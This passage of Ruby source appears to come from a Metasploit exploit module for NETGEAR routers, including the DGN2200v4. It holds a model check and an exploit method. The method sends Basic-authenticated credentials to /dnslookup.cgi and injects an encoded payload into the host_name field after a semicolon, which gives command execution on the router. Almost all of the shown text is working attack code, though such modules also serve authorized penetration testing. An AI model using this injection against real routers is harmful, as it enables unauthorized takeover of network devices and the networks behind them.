'DGN2200v4'] if model_numbers.include?(model) print_good("Router may be vulnerable (NETGEAR #{model})") return CheckCode::Detected else return CheckCode::Safe end else print_error('Router is not a NETGEAR router') return CheckCode::Safe end end def exploit check # Convert datastores user = datastore['USERNAME'] pass = datastore['PASSWORD'] hostname = datastore['HOSTNAME'] vprint_status("Using encoder: #{payload.encoder} ") print_status('Sending payload...') vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)") creds_combined = Base64.strict_encode64("#{user}:#{pass}") vprint_status("Encoded authentication: #{creds_combined}") res = send_request_cgi({ 'uri' => '/dnslookup.cgi', 'headers' => { 'Authorization' => "Basic #{creds_combined}" }, 'vars_post' => { 'lookup' => 'Lookup', 'host_name' => hostname + '; ' + payload.encoded }}) end end